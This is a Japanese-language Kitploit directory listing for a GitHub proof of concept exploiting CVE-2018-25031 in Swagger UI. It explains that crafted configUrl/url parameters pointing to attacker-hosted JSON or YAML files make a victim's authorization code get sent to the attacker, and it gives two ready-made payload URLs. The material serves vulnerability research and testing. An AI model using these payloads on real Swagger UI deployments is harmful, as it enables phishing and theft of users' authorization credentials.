Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
POC-CVE-2018-25031 — CVE-2018-25031(Swagger UI XSS)の概念実証エクスプロイト。細工されたconfigUrl/urlパラメータを介して認証コードを外部に漏えいさせます。 | Kitploit
ツール/GitHubGitHub/geozin/poc-cve-2018-25031
フィッシングツール脆弱性分析エクスプロイトウェブアプリケーション悪用ソーシャルエンジニアリング
GitHubgeozin/poc-cve-2018-25031

POC-CVE-2018-25031

CVE-2018-25031(Swagger UI XSS)の概念実証エクスプロイト。細工されたconfigUrl/urlパラメータを介して認証コードを外部に漏えいさせます。

リポジトリを見る
1172年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-25031 - Swagger UI 4.1.3以前

被害者に認証コードを入力させ、そのコードを攻撃者に送信するシンプルなPOC(CVE-2018-25031)です。
XSS脆弱性 https://github.com/VictorNS69/swagger-ui-xss と併用できます。

パラメータを見つけ、適切なファイルを指定する必要があります:configUrlにはJSONファイル、urlにはYAMLファイルを割り当てます。

例:

https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml

スクリーンショット:


被害者がAPIを使用しようとしてAuthorization Codeを入力し、Executeをクリックしても、何も表示されません。しかし、Authorization Codeを含むリクエストが攻撃者のURLに送信されます。

参照:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031

ツールをダウンロード